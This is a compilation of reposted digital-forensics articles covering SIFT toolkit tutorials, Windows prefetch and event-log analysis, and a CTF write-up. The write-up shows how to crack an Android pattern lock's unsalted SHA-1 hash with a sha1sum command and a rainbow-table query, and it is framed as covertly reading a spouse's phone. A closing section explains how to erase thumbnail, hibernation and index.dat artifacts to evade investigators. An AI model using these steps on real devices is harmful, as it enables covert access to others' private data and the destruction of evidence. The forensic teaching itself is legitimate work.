  3. This is a continuation of the first article on the SANS Investigative Forensic Toolkit. In this article we will be covering the rest of the tools discussed at the start of that article. Maltego Maltego is an open source intelligence gathering and forensics tool. It provides a library of transforms for the discovery of data from open sources and for visualizing that information in a graph format. It provides links between people, websites, groups, and all other Internet infrastructure which might be connected to some entity. To use it we need to create an account and then log in using those credentials. Once we have logged in, we will have a long list of infrastructure entities which we may use for information gathering. This is a very powerful tool because of the links that it creates. Now let us start some investigation/intelligence gathering about example.com. This has been done purely for demonstration purposes. Now let us run all transforms by right-clicking the domain entity. We can see a large amount of information being shown to us. We can also run specific transforms to gather more information on particular entities. Hence you can see that we were able to gather a lot of information. Similarly, running multiple transforms can keep digging out more information. Go ahead and try this on any entity you wish. PTK The PTK tool is a digital forensic tool and a GUI for the Sleuth Kit. It uses a centralized database for case management and has the ability to allow multiple investigators to work on the same case. It has an interesting timeline analysis feature with file timestamps that clearly lists the timeline of all activities. My personal opinion is that this is one of the best tools for digital forensic investigation. Let us get some hands-on experience with it now. This is how the interface looks: Let us create a new case to do the forensic investigation. We have our first case created here: Now let us add a raw image to perform our investigation on. We have the option to calculate MD5 and SHA1 hashes as well. After filling in the details, we finally have the image added to our case: We now move on to some indexing operations for the image to keep track of our investigation. Now let us move on to some analysis, where we will analyze the image for forensic evidence. So we have it here, a detailed view of all the files on the image with timestamps, modification times, and MD5 hashes as well. This is just fabulous! We can export these files for further investigation as well as see all the details about a specific file. The timeline feature which I talked about previously is just awesome. I can have a view of all the files and activity during a particular time frame, which helps a lot in the investigation. So here is how we do it. Suppose I want to find out what files were accessed around the time a particular incident happened. I simply put in the date which I suspect and get the results. We also have the feature to view the file details or the particular file in the timeline: PTK has a keyword search that helps find important keywords during a forensic investigation. Here we search for the keyword “password”; let us see if it fetches some good results for our investigation. On searching for this keyword, we find a file named secret.txt which contains the keyword. Keyword searching like this may reveal a lot of important information during an investigation and is hence very important.
Let us view this file to see whether its contents are interesting. It looks as if we have some of the user’s passwords. We also have a Gallery section that separates out all the images to make our investigation simpler. Here is how it looks: PTK also gives us the option to view complete details of the image being forensically investigated. Here is how we do it: We also have options for bookmarking certain items that might be important, and a neat report generator as well. PTK makes forensics extremely easy; a piece of cake! Volatility Volatility is one of the best tools for live memory forensics. It comes bundled with SIFT for doing memory forensics. Here it is: I have already covered the Volatility framework in detail here; please check it out: Memory Forensics and Analysis Using Volatility - InfoSec Institute SANS Cheatsheets There are a few cheatsheets provided by SANS in SIFT to make forensic work pretty easy. It is recommended that you check them out. Command Line Tools There is also a long list of command line tools present under /usr/local/bin: Mobile Forensics SIFT comes bundled with mobile forensics tools such as Blackberry Analyzer and iPhone Analyzer, which are quite effective. Reference Links for Parts 1 and 2 SANS SIFT Kit/Workstation: Investigative Forensic Toolkit Download Maltego - Wikipedia, the free encyclopedia PTK Forensics - Wikipedia, the free encyclopedia www.basistech.com/conference/2010/osdf-slides/forte-ptk-forensics.pdf Source
  4. The SANS Investigative Forensic Toolkit (SIFT) is an interesting tool created by the SANS Forensic Team and is available publicly and freely to the whole community. It comes with a set of preconfigured tools to perform computer forensic digital investigations. It is based on Ubuntu and has a long list of tools for present forensic needs. We will have a walkthrough of some of the very famous tools used in forensic investigations. You can download the SIFT iso from this link: SANS SIFT Kit/Workstation: Investigative Forensic Toolkit Download It supports evidence formats such as raw format (.dd), EnCase image file format (E01), and advanced forensics format (AFF). Setup There are a few things that you might need for booting this up, such as: VMware/VirtualBox Good RAM, CPU and hard disk space SIFT ISO/VM image You can simply boot the SIFT iso as a bootable disk or choose to install it as a complete operating system. The default login credentials are: username: sansforensics and password: forensics. This includes a long list of software, a few of which we will cover with complete tutorials based on forensic analysis, such as: Autopsy DFF – Digital Forensic Framework EVTX – Event Log Viewer Maltego PTK Md5deep SANS Cheatsheets Volatility We will start the forensic analysis tutorials with these tools from SIFT. Currently I have with me a raw dd image for our forensic analysis: Md5deep This is a small command line utility in SIFT that may be used for calculating MD5 hashes, comparing hashes, and playing around with them. Suppose we want to check if the integrity of our file is maintained: we can simply hash it and check. Any changes made to the file will change its MD5 hash. So let’s calculate an MD5 for our image file before doing the forensic analysis. You can see the MD5 calculated by our tool in the screenshot: Similarly, we can calculate MD5 hashes for files recursively and play with many more options. For more information and usage, simply use man md5deep. We similarly have utilities such as sha1deep and sha256deep for calculating SHA1 and SHA256 hashes for integrity checking. Autopsy Now we move to the actual analysis of our image using Autopsy. This tool is the GUI front end for the Sleuth Kit. Let us have a look. It is found under Applications > Forensics. This is what Autopsy looks like: Let us open a new case by clicking “New Case.” We have to fill in a few details to create a new forensic investigation case. We have successfully created a new case; let us move on to the next step. We add more details about the case and move forward. Now we move on to adding our image to the case for doing the forensic analysis. We give the location of the forensic image: Next, we can calculate MD5 hashes, also using Autopsy: Autopsy lists all of the file system details and the mmls tool (command line) output for us: Now we move on to the analysis part; click on “Analyze.” We do an analysis of the files in the C partition of the image: We can do a keyword search, view metadata, and view the contents of any sector in the file system. DFF – Digital Forensic Framework This is a really nice tool for doing digital forensic investigations, since it displays tons of information about the evidence. It is made of different modules based on Python that perform various steps in an investigation, such as the file system modules fatfs and ntfs to detect the file system. It has a viewer module to display text, images, etc. There are many more, such as Crypto, Hash, Databases, Statistics, etc.
These modules are restricted to specific investigation tasks; for example, the Hash module creates hashes for files to monitor file integrity, and similarly for the other modules. This time we take another forensic test image, to contrast the results and views better for the reader, since this image specifically contains picture files, doc files, txt files, etc. This is how DFF looks: Now we add an evidence file, which is a raw dd image of a USB drive. To do this, go to File > Open Evidence File: You can see that the evidence item has been added. Now we will simply try to analyze the file; the filesystem module automatically detects that it is a FAT file system and runs the fatfs submodule. Once we apply the fatfs module we can see the files under “Logical Files.” The files in red are the ones that were deleted from storage. We notice that all the files have been listed under the root partition. Since we just have one partition in this image, we can see that this partition has image files, text, and document files. Now, in order to further analyze them, suppose we pick an image file: we use the picture module: Similarly, we can use the text module to view our text files: EVTX – Event Log Viewer This is a really nice tool to audit Windows log files and forensically investigate them. Here I open an event log file extracted from a Windows XP system in EVTX for my forensic investigation. Here is an image showing the description of an event and more information about it. In the image below, we see that this is an informational event, with source MsiInstaller, and the product that was installed is Microsoft .NET Framework 3.5. Similarly, we can investigate whether a suspicious installation was performed: In the next part we will cover the rest of the tools in SIFT. Source
  5. Searching the net, I came across a very interesting site. First, register here: https://www.skillset.com/authake/user/register Certifications: https://www.skillset.com/certifications #CEH exam: https://www.skillset.com/certifications/ceh #CISSP exam: https://www.skillset.com/certifications/cissp #PMP exam: https://www.skillset.com/certifications/pmp
  6. Introduction In this paper I’ll show you how to find an Android user’s pattern lock. I assume that the technique I’ll demonstrate can work only on a rooted device. Actually, this article will be based on a problem given in a web-based CTF (Capture the Flag, a computer security competition). Problem statement: Having doubts about the loyalty of your wife, you’ve decided to read the SMS, mail, etc., on her smartphone. Unfortunately it is locked with a pattern. In spite of this, you still manage to retrieve its system files. You need to find the pattern to unlock the smartphone. You can find a link to download the full dump of system files in the references section. Abstract Nowadays many, if not all, smartphones offer, in addition to the traditional password lock protection, a pattern lock, which is a gesture drawn by the phone owner joining points on a matrix in order to unlock the phone. This “new security approach” prevents any undesired taps on the device, since the user is asked to authorize access. This manipulation seems to be complicated and secure enough, which is totally wrong! If you have a closer look at what a pattern lock actually is and how it works, you can easily conclude that it’s no more than a 3×3 matrix with some built-in conditions: the pattern drawn by the user must contain at least four points and each point can only be used once; since it’s a 3×3 matrix, the maximum number of points a lock pattern can contain is nine. Studying the Pattern Scheme The 3×3 points of the pattern lock can be represented by numbers (digits); in fact, the points are registered in order from 0 to 8 (the top left corner is 0 and the bottom right corner is 8): So the pattern used in the image above is 1 – 2 – 5 – 8 – 7 – 4. Statistically, it’s not a very big deal to try every combination between 0123 and 876543210; that is not even 0.2% of all possible nine-digit numbers, and we should have about 985,824 possible pattern schemes on an Android device. Android devices store pattern lock data as an unsalted SHA-1 hash of the pattern’s byte sequence, using something similar to this code snippet: private static byte[] patternToHash(List<LockPatternView.Cell> pattern) { if (pattern == null) { return null; } final int patternSize = pattern.size(); byte[] res = new byte[patternSize]; for (int i = 0; i < patternSize; i++) { LockPatternView.Cell cell = pattern.get(i); res[i] = (byte) (cell.getRow() * 3 + cell.getColumn()); } try { MessageDigest md = MessageDigest.getInstance("SHA-1"); byte[] hash = md.digest(res); return hash; } catch (NoSuchAlgorithmException nsa) { return res; } } This means that, for example, instead of storing 125874 directly, it stores the hashed byte array in a system file called gesture.key located in the /data/system folder. We can read most of this information directly in “The Android Open Source Project” java files: /* Generate an SHA-1 hash for the pattern. Not the most secure, but it is at least a second level of protection. First level is that the file is in a location only readable by the system process. @return the hash of the pattern in a byte array. */ According to this piece of code, our sample pattern should be saved as 6c1d006e3e146d4ee8af5981b8d84e1fe9e38b6c The only little problem facing us now is that SHA-1 is a one-way cryptographic hash function, meaning that we cannot get the plain text back from the hash.
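Even though the hash cannot be reversed, nothing stops us from hashing candidate patterns ourselves and comparing the results. A minimal sketch on a Linux shell, feeding sha1sum the raw point-index bytes of the sample pattern 1-2-5-8-7-4, just as patternToHash() does (no salt):
# printf '\001\002\005\010\007\004' | sha1sum
The octal escapes produce the raw bytes 1, 2, 5, 8, 7, 4, and the printed digest can be compared directly against the contents of gesture.key.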
Due to the fact that we have a finite number of possible pattern combinations, and the additional fact that Android does not use a salted hash, it does not take long to generate a dictionary containing the hashes of all possible sequences from 0123 to 876543210. Problem solving We know enough to analyze the file system dump we’ve got; it’s not hard to find gesture.key and to explore its content: You can open it using any text or hexadecimal editor: The last thing to do right now is to compare the bytes of this file, 2C3422D33FB9DD9CDE87657408E48F4E635713CB, with the values in the previously generated dictionary to find the hash that recovers the pattern scheme. A previously made dictionary can be downloaded in the reference section and, using any SQLite browser, you can easily find the original pattern scheme: Select * from RainbowTable where hash = “2c3422d33fb9dd9cde87657408e48f4e635713cb”. Which means that this is the pattern that unlocks the “wife’s device”: Conclusion There is no difficulty in cracking or bypassing this kind of protection on an Android-based device; the only real obstacle is that we cannot directly access the /data/system/ folder and the gesture.key file except when we are dealing with a rooted device. This is done for fun and curiosity purposes since, if you have full access to a mobile, you can just remove or replace the file containing the SHA-1 hash with a prepared one; in addition, in most cases lock files are valueless from a forensic point of view. More complicated techniques could be used if the device is not rooted. We are talking about a physical dump of the memory chip and the use of some special hardware tools like a RIFF Box and a JIG adapter, but this is not our concern for now. References: The Android Open Source Project (LockPatternUtils.java): https://android.googlesource.com/platform/frameworks/base.git/+/f02b60aa4f367516f40cf3d60fffae0c6fe3e1b8/core/java/com/android/internal/widget/LockPatternUtils.java Link to download the dictionary: SHA1-android-pattern Link to download the partial phone dump: chandroid Source
  7. 1. Introduction
In this article, I'm going to focus on prefetch files: their characteristics, structure, configuration, uses, metadata, and their points of interest in terms of forensic value. They include the name of the executable which they accelerate, Unicode itemizations of the DLLs that the executable requires to function, timestamps which pinpoint when the application was last launched, and a counter that keeps track of the number of times the executable has been launched, inter alia. Figure one reveals the four most important elements of a prefetch file in terms of forensic significance. Prefetch files can reveal that an application was actually installed and launched by the suspect at some point in time. Even if prefetch files unveil nothing more than the presence of a wiping application like "Evidence Eliminator" (a program whose purpose is to thoroughly remove selected data from the hard drive), because the actual evidence was destroyed by the wiping application, the mere presence of a wiping application can itself be as incriminating as the files that were destroyed with it.
2. Basics of Prefetch files
Prefetch filenames follow this naming convention: {exename}-{hash}.pf Exename is the name of the executable, hash is an eight-character hexadecimal hash of the path from which the executable was launched, and .pf is the file extension. Note that a dash separates the exename from the hash and that the filename is made up of only uppercase characters, with the exception of the file extension. Furthermore, when an application is started from three separate locations on the drive, three distinct prefetch files will be created, each corresponding to one of the locations from which the application was run. Prefetching also exists in Windows Vista, where it has been enhanced by SuperFetch, ReadyBoost and ReadyBoot. SuperFetch logs usage scenarios and places resources into memory before they are requested. ReadyBoost is a disk cache which boosts processes by utilizing any type of portable flash mass storage as a cache, enabling the OS to service random disk reads with enhanced performance. ReadyBoost's caching doesn't only relate to the page file or system DLLs, but to the whole disk content. In one test case, ReadyBoost reduced the duration of an operation from 11.7 to 2 seconds, although simply increasing the main memory from 512 MB to 1 GB diminished the length of the operation to 0.8 seconds (without any reliance on ReadyBoost). Prefetching takes place when the OS (the Windows Cache Manager, in particular) monitors components of data that are extracted from the hard drive into RAM. The monitoring takes place on three occasions. First, it begins on every system startup and lasts for two minutes of the boot process. Second, it also takes place following the completion of the startup of all Win32 services and lasts for sixty seconds. Finally, it occurs each time an application is launched and lasts for the first 10 seconds of its execution. Subsequently, the Cache Manager, along with the Task Scheduler, writes the data into .pf files. These files speed up the system by making the referenced data promptly available before there is any actual demand for it from the user. Hence, the prefetcher acts as an allocator of data from the hard drive into the main memory before any actual request for it has been made. Note that SSD drives have Prefetch turned off by default.
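As a small illustration of the naming convention above, the following Python sketch (the directory path and the grouping logic are only an example) lists the prefetch folder and groups the .pf files by executable name, so an application launched from several locations shows up with several path hashes:
import pathlib
from collections import defaultdict

# The default prefetch directory; adjust the path for a mounted image.
prefetch_dir = pathlib.Path(r"C:\Windows\Prefetch")

by_exe = defaultdict(list)
for pf in prefetch_dir.glob("*.pf"):
    # {EXENAME}-{HASH}.pf: split on the last dash so executables with dashes still parse.
    exename, _, path_hash = pf.stem.rpartition("-")
    by_exe[exename].append(path_hash)

# An application launched from several locations shows up with several path hashes.
for exename, hashes in sorted(by_exe.items()):
    print(exename, hashes)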
3. Prefetching configuration in the Registry
Picture one below reveals the values of prefetching that can be configured in the registry. As can be seen in the picture, the path to the configuration parameters of the Prefetcher is HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters. To configure the Prefetcher, one has to change the value of EnablePrefetcher to one of the values mentioned below; to configure Superfetch, one has to do the same with EnableSuperfetch:
3: Enables Prefetcher/Superfetch for application startup and boot
2: Enables boot prefetching
1: Enables Prefetcher/Superfetch for application startup
0: Disables Prefetcher/Superfetch
It can be deduced that cyber-criminals can effortlessly disable prefetching and get rid of prefetch files to remove traces of illegal activity, such as regularly opening an application filled with child pornography, or accessing copyrighted material without the relevant permissions. The only cost is a worsening of the performance of the system. Picture one: Configuration of Prefetcher and Superfetch in the Registry Editor (Windows 7) Superfetch files begin with the 'Ag' prefix and end with the '.db' extension. The data that is written into Superfetch files is collected by Sysmain.dll, situated in %SystemRoot%\System32, and is a part of the Service Host process (Svchost.exe), which is situated in the same directory. The '.db' files can be found in the %SystemRoot%\Prefetch (usually C:\Windows\Prefetch) directory, along with the other prefetch files. Windows XP, Vista and Windows 7 perform application prefetching by default, while Windows 2003 and 2008 are capable of performing prefetching though the feature is turned off by default. Also, every version of Windows following Windows XP does boot prefetching.
4. Structure of Prefetch files and metadata
The metadata that prefetch files consist of is of particular relevance to forensic analysts. In Windows XP, the 64-bit time stamp indicating when the executable was last launched is at offset 0x78 within the file, and the counter that pinpoints the number of times the executable has been launched is a 4-byte DWORD value situated at offset 0x90 (144 bytes). On Windows Vista and Windows 7 systems, on the other hand, the last-run time stamp is at offset 0x80 in the binary contents of the particular prefetch file, and the "number of times opened" counter is situated at offset 0x98. It's also possible to dig up more data from the metadata of a prefetch file. Inside the prefetch file, there's data revealing the volume from which the executable was started, and strings that show the paths to the modules which the executable required to start. Figure two reveals some key information about the structure of prefetch files. Table one describes some preliminary characteristics of prefetch files:
Integer values: kept in little-endian.
Strings: kept in 16-bit Unicode Transformation Format (UTF-16), little-endian, with no byte-order mark.
Time stamps: kept in Coordinated Universal Time (UTC) as Windows FILETIME.
Table 1: characteristics
Figure 2 is based on information gathered from David Koepi (http://davidkoepi.wordpress.com/2013/09/29/prefetch-forensic/) and two Forensics Wiki pages (Windows Prefetch File Format - ForensicsWiki and Prefetch - ForensicsWiki).
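As a rough illustration of the last-run and run-counter offsets quoted above, the Python sketch below (the file name is made up, and no header validation is performed, so treat it as a sketch rather than a parser) pulls both values out of a prefetch file:
import struct
from datetime import datetime, timedelta

# Offsets quoted above: XP keeps the last-run FILETIME at 0x78 and the run counter at 0x90,
# while Vista/7 keep them at 0x80 and 0x98.
OFFSETS = {"xp": (0x78, 0x90), "vista7": (0x80, 0x98)}

def filetime_to_datetime(filetime):
    # A FILETIME counts 100-nanosecond intervals since 1 January 1601 (UTC).
    return datetime(1601, 1, 1) + timedelta(microseconds=filetime // 10)

def last_run_and_count(path, version="vista7"):
    ts_off, count_off = OFFSETS[version]
    with open(path, "rb") as f:
        data = f.read()
    last_run = struct.unpack_from("<Q", data, ts_off)[0]      # 64-bit little-endian FILETIME
    run_count = struct.unpack_from("<I", data, count_off)[0]  # 4-byte DWORD
    return filetime_to_datetime(last_run), run_count

# Hypothetical usage (the hash in the file name is made up):
# print(last_run_and_count(r"C:\Windows\Prefetch\NOTEPAD.EXE-D8414F97.pf"))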
5. Other points of interest in prefetch files
Besides the obvious importance of prefetch files in answering when a certain activity occurred (via the last execution time), what activity took place, and how frequently it was performed (via the counter that shows the number of times the executable has run, which increments by one on each launch), prefetch files may also reveal obfuscated directories. For instance, let's say a prefetched executable (notepad.exe) has been executed fifty times. By examining the prefetch file, one can see the paths of the files that triggered this execution; let's say you stumble upon list6.txt, which is situated in a TrueCrypt volume. As TrueCrypt enables users to conceal directories, it's vital to examine the paths enumerated in the prefetch files, as these may be a door towards a data source that would not otherwise have been identified. If the examiner didn't look at the paths, they might never have identified the obfuscated directory with the C:\Windows\System32\Neohiddencreditcards\list6.txt path hidden with TrueCrypt, because the System32 directory is filled with programs that are in use by the OS and an ordinary person would never check its contents. Additionally, the full directory path enumerated in the prefetch file reveals the user accounts under the Users directory (for Windows Vista/7) and the Documents and Settings directory (for Windows XP). An examination may unveil that a temporary account was created for the purpose of performing criminal activity, by pinpointing applications that were launched at some point in the past by an unauthorized or abnormal user, which would be an answer to the "who" question of an investigation. Furthermore, by examining the full paths enumerated in the prefetch files, one may see whether the program, application or file was launched from an external storage device, as the entry would differ from the entry of an application accessed from the hard drive. Thereafter, the last execution time may be correlated with the USBStor registry key and, if the time stamps match, the USBStor registry key entry can be examined to get the serial number of the external storage device, which will aid in solving the "what" and "why" questions surrounding an investigation. When cyber criminals infiltrate a system and modify the timestamps of an application, they may be unaware of the data that prefetch files contain. If the cyber criminal alters the SIA and FNA time stamps in the Master File Table to hinder the examination, the entries in the prefetch files remain unchanged and will pinpoint the real time stamps. In that way, examiners may thoroughly avoid the cybercriminal's time stomping attempts. The Master File Table (MFT) is a file that the NTFS file system contains. The MFT has no less than one entry per file on the NTFS file system volume; it even has an entry for itself. These entries include data about each file, such as the file's size, permissions, contents and time and date stamps. The metadata is kept in one of two places: MFT entries, or space separate from the MFT but defined by it. Thus, it's no wonder that time stomping efforts are aimed at the MFT: it's an enormously large collection of valuable metadata. Prefetch files need to be examined to determine whether there were possible time stomping attempts.
6. Summary and Conclusion
To put it in a nutshell, prefetch files are designed to boost the speed of the system.
In computers, the saying "speed kills" has to be turned into its negation, something like "the absence of speed kills." Prefetching can be disabled and enabled as much as one wants, and each time the contents of the prefetch files are reset. Besides their primary purpose, prefetch files are useful to forensic examiners because they can prove that an application was installed and started on a particular machine. They can pinpoint the time when it was opened and how many times it was opened. They can reveal from which volume it ran and which modules the application loaded. Furthermore, prefetch files may also reveal hidden or obfuscated directories and temporary, unauthorized or otherwise abnormal accounts. They may expose external storage devices and they can pinpoint whether there was time stomping. Therefore, prefetch files help examiners answer the "who", "what", "why", "when" and "where" questions that surround any digital or non-digital investigation. That certainly means that their analysis is of utmost importance. Figure three reveals the questions asked whenever a crime has to be investigated. That highlights the importance of prefetch files for solving cyber crimes, as a source of answers to these questions.
References:
Forensics Wiki, 'Prefetch', 21 Oct 2013. Available at: Prefetch - ForensicsWiki
Forensics Wiki, 'SuperFetch', 3 Sept 2013. Available at: SuperFetch - ForensicsWiki
Ryanmy, 'Misinformation and The Prefetch Flag', 25 May 2005. Available at: Misinformation and The Prefetch Flag - Funny, It Worked Last Time - Site Home - MSDN Blogs
Wikipedia, 'ReadyBoost', 17 Oct 2013. Available at: ReadyBoost - Wikipedia, the free encyclopedia
Wikipedia, 'Prefetcher', 13 Oct 2013. Available at: Prefetcher - Wikipedia, the free encyclopedia
Forensics Wiki, 'Windows Prefetch File Format', 21 Oct 2013. Available at: Windows Prefetch File Format - ForensicsWiki
David Koepi, 'Prefetch Forensic', 29 Sept 2013. Available at: http://davidkoepi.wordpress.com/2013/09/29/prefetch-forensic/
Mark Wade, 'Decoding Prefetch Files for Forensic Purposes, Part 1', 12 Aug 2010. Available at: Decoding Prefetch Files for Forensic Purposes: Part 1
Windows Dev Center, 'Master File Table', 10 Dec 2013. Available at: Master File Table (Windows)
Cory Altheide and Harlan Carvey, "Digital Forensics with Open Source Tools", 2011
John Sammons, "The Basics of Digital Forensics", 2012
Source
  8. Introduction
This article begins with event logs and discusses the structure of their headers and the structure of their building blocks, the headers of the event records. It mentions some open source tools that can parse event logs and briefly explores event logs on versions of Windows below and above Windows Vista, along with an exploration of their characteristics. Links to MSDN pages are provided for further reference on event logging. The article then continues with a brief examination of the three computer sleep modes (sleep, hibernation, and hybrid sleep) and their significance for forensic analysts. To help you picture this point, an explanation is given of what happens to information that is deleted from the computer with the standard "Delete" button or through the contextual menu; this explanation matters for the discussion because data written to the HDD remains useful to forensic analysts beyond the point of deletion. Finally, we have provided a list of quick ways to remove artifacts from your Windows system. The removal of objects such as thumbs.db, hiberfil.sys, pagefile.sys, metadata and Index.dat is discussed, and the article concludes by mentioning the names of a few programs that claim to permanently remove data from your computer.
Event Logs
Event logs have headers for the file itself and headers for the individual entries, and both include the unique identifier (signature) "LfLe" in their structure. The length of the records themselves is variable. Figure 1 reveals the structure of an entry header. Figure 1: This illustrates the structure of an event log's entry header. It is based on the one provided by Jeff Hamm in his paper "Carve for Records, Not Files." Available at: http://computer-forensics.sans.org/summit-archives/2012/carve-for-record-not-files.pdf Windows NT, 2000, XP, and 2003 use a logging system called Event Logging. The MSDN site contains information concerning the structures that make up event logs (http://msdn.microsoft.com/en-us/library/windows/desktop/aa363652(v=vs.85).aspx). These structures are all well documented, so it is not difficult to write tools that parse the event records that these logs contain in binary form and also extract them from unallocated space. Parsing the log on a binary level is valuable because the header of an event log file only accounts for a certain number of event records in the particular file, whereas parsing the file in binary form may recover additional event records. The event log file extension is ".evt." Event log headers are 48 bytes long, marking the beginning of the event log, and they can contain very useful data for forensic examiners. The header can be used to validate the file; it includes starting and ending offsets, which tell the Microsoft API where the oldest event record is situated and where the ending record is situated, respectively. Records contained within event logs all have a unique identifier referred to by Microsoft as a signature; this identifier is "LfLe", or 0x654c664c in hexadecimal notation.
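The fixed signature makes these records easy to carve. The following Python sketch follows the EVENTLOGRECORD layout documented by Microsoft (a 4-byte length, the "LfLe" signature, the record number, two 32-bit Unix time stamps and the event ID); it is an illustration rather than a complete parser, and the file name in the usage example is only a placeholder:
import struct
from datetime import datetime, timezone

SIGNATURE = b"LfLe"  # 0x654c664c, present in the file header and in every record header

def carve_event_records(data):
    # Walk a raw buffer (an .evt file or an unallocated-space dump), find each "LfLe"
    # signature and read the fields around it. The 48-byte file header also carries the
    # signature and shows up as a "record" of length 0x30, so it is filtered out here.
    pos = data.find(SIGNATURE)
    while pos != -1:
        start = pos - 4  # the record begins with its 4-byte length
        if start >= 0 and start + 24 <= len(data):
            length, _, rec_no, t_gen, t_written, event_id = struct.unpack_from("<6I", data, start)
            if length > 0x30:
                yield {
                    "record_number": rec_no,
                    "generated": datetime.fromtimestamp(t_gen, tz=timezone.utc),
                    "written": datetime.fromtimestamp(t_written, tz=timezone.utc),
                    "event_id": event_id & 0xFFFF,
                    "length": length,
                }
        pos = data.find(SIGNATURE, pos + 4)

# with open("SecEvent.Evt", "rb") as f:
#     for record in carve_event_records(f.read()):
#         print(record)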
We mentioned previously that the headers of event log files are 48 bytes in size, and that is additionally specified in the 4-byte DWORD value that brackets the header record (it can be located both at the record's start and at its end); in this case, the value is 48, or 0x30. This is valuable to know because the event record's header, as opposed to the event log file's header, has a size of 56 bytes and does not have any of the real subject matter of the file embedded in it. Event records are bracketed by size values as well. Offsets pointing to the strings, the lengths of the strings, the UserSID where appropriate, and the data input in the event entry are all parts of the event record's structure, and they reveal data about the entry itself. Furthermore, two time stamps are inserted in the event record's header: one pinpointing when the particular event was generated or "came to life" and another showing when the event was written to the .evt file. The gmtime() function in Perl can effortlessly transform the 32-bit Unix times of these time stamps into legible dates. One can make use of evtparse.pl, an open source tool, to parse the information from the relevant .evt files. Evtparse.pl simply extracts the data and outputs the event record information, while evtrpt.pl not only produces the event record data but also scans this data and outputs statistics concerning the frequency of different SIDs and sources for the event records, as well as the date range of all entries located in the file. Such information comes in handy when an analyst is searching for activity that happened on the machine at a given time. For instance, if an analyst parses an event log in search of a particular event ID or a specific event, he/she can see whether it is present within the file, whether the date range of the accessible event entries includes the window of exposure, and whether events of interest exist within the time frame when the incident occurred, and can save himself/herself a substantial amount of time by moving to a different source of data if the search brings no results. The latest editions of Windows (Windows Vista and later versions) resort to the Windows Event Log mechanism, which entirely replaces the event logging mechanism of the previous Windows versions, such as Windows NT, 2000, XP, and 2003. The Windows Event Log mechanism is much more complicated; the specifics can be examined at the MSDN Windows Event Log Reference (http://msdn.microsoft.com/en-us/library/windows/desktop/aa385785(v=vs.85).aspx). Part of the change in the new Windows Event Log scheme is that both the structure of the recorded events and the way they are recorded were modified. A tool based on the Perl high-level programming language, named evtxparse.pl, was developed to parse Windows event logs on Windows Vista and beyond.
Modes of Computer Sleep and Deleted Data
Background
Computers, just like humans, need time to rest; alternatives to shutting the machine down are sleep and hibernation. From a user perspective, sleep/hibernation saves a considerable amount of energy and allows users to resume all processes and applications from where they left off. Furthermore, sleep/hibernation may be safer than leaving the computer on when you are taking a lunch or a coffee break because, when the computer is awakened from its rest, it may be set to prompt for a username and password, although simply logging off would have the same effect if you decide to leave it on.
When the computer is sleeping, it needs only a tiny amount of power to maintain its state, and if a laptop's battery gets critically low this sleep will be "transformed" into hibernation. There is an extremely large difference in the evidence that can be collected from the two states. Hibernation and hybrid sleep are considered "deep sleep" modes because they store the data related to the processes and applications running on the computer on the hard disk, instead of storing it in the main memory (as sleep mode does). There are three different modes of rest that computers can immerse themselves into: sleep, hibernation, and hybrid sleep.
Explanation: Deleted Data
To get a picture of why sleep and hibernation differ enormously in importance for forensic examiners, we will briefly discuss what happens when a user deletes data from his hard drive:
The user deletes a file (or files).
The computer receives the input from the relevant input device (keyboard/mouse, etc.).
The computer marks the space that the file(s) occupied as available.
The "removed" file(s) remain untouched until new data takes their place and overwrites them.
Basically, what happens is that the file moves from allocated space to unallocated space. Allocated space can be explained as being all the files that we can view and execute in Windows. Files located in the allocated space cannot be overwritten, as the section of the hard drive where they are located is reserved for them; new files can only be stored in the unallocated space (on standard computers). Thus, if you have a 1 TB HDD with 500 GB of allocated space and you delete an incriminating document that occupies 5 MB, you will be left with roughly 524 GB of unallocated space, of which the 5 MB that held the incriminating document is only a tiny fraction, which means that a very long period of time may pass before it gets overwritten by new files. Usually, files in the unallocated space are identified by means of their distinctive features. Examples of these distinctive features (or signatures) are file headers and footers that may identify files and signal both their beginning and end. The process of extracting data from the unallocated space is called "file carving" and it is usually performed via tools, but it can also be performed manually. However, we will discuss file carving in a separate article.
Sleep
Microsoft likens sleep to "pausing a DVD player" (Microsoft's Windows sleep and hibernation FAQ), as its function is to resume the processes and programs running on the computer as promptly as possible (besides conserving energy). What happens in sleep mode is that a minute amount of power is constantly fed to the main memory, which keeps the data intact. However, the main memory (or RAM) is volatile, so the data vanishes as soon as the power is removed. Therefore, sleep is not a great source of evidence for forensic examiners.
Hibernation
Hibernation uses the least amount of power of the three sleep modes. In hibernation, the computer creates a snapshot of all the data in RAM and writes it to the HDD. It is mostly designed for laptops, not desktops. MoonSols Windows Memory Toolkit enables forensic analysts to read and write the Windows hibernation file.
Hybrid sleep
As can be inferred from its name, hybrid sleep is a mixture of the "sleep" and "hibernation" modes; it is intended for desktops rather than laptops.
In this mode, the computer preserves insignificant amounts of power applied to the machine’s RAM (to maintain the data and the applications present before the hybrid sleep) and writes this data to the HDD. Suspects might miss these hibernation files and the page file(s) as they are unknown to many computer users and are frequently neglected during last minute “delete-a-thons.” Erasing Windows Artifacts In this section, we provide a few methods of erasing artifacts. Thumbs.db, which is a cache in Windows that stores thumbnail images of all graphics files and is a valuable Windows artifact, can be disabled by clicking Start -> Control Panel -> Folder Options -> View -> check the button “Always show icons, never thumbnails” in the Files and Folders section -> Apply -> OK. This action will stop thumbs.db from reappearing after being deleted (this procedure for disabling it is for Windows Vista and Windows 7). Thumbs.db can also be deleted in Windows XP by clicking on My Computer -> Tools -> Folder Options -> View -> check “Do not cache thumbnails” -> OK. However, performance will drop when you browse through your hard drive’s partition’s contents. There are numerous thumbs.db files scattered across your computer and you will only see them if you enable the “Show Hidden Files and Folders” option in Windows. Also, the evidence that may be piled up in the hibernation’s file hiberfil.sys (all processes, programs, applications and files opened in a given session are written to the hard drive when you put your computer in hibernation) may be removed without the file coming back by disabling the hibernation function. You disable it by opening the command prompt with administrative privileges and typing “powercfg.exe –h off” (for Windows Vista, Windows 7, and Windows XP). Furthermore, free programs such as Index.dat Analyzer can remove all Index.dat files present on the computer until Windows recreates them. Index.dat is an invaluable source of data for forensic analysts, as it stores data on each website you open. Websites offering services like search engines and online banking are kept in such files, as well as e-mails that you have sent through Microsoft Outlook and Microsoft Outlook Express. Index.dat files are cloaked and not hidden, so you will be unable to access them through the Windows built-in “Find” or “Search” option and they are not shown because cloaked files are handled in a different way than hidden files. Furthermore, files with the index.dat name are being constantly utilized while Windows is in use, so it is impossible to remove them without leaving Windows first. The deletion options embedded in IE do not enable you to remove index.dat files and the only other option to deleting index.dat outside of Windows is killing the explorer.exe process and starting a command shell. Figure 2: Index.dat 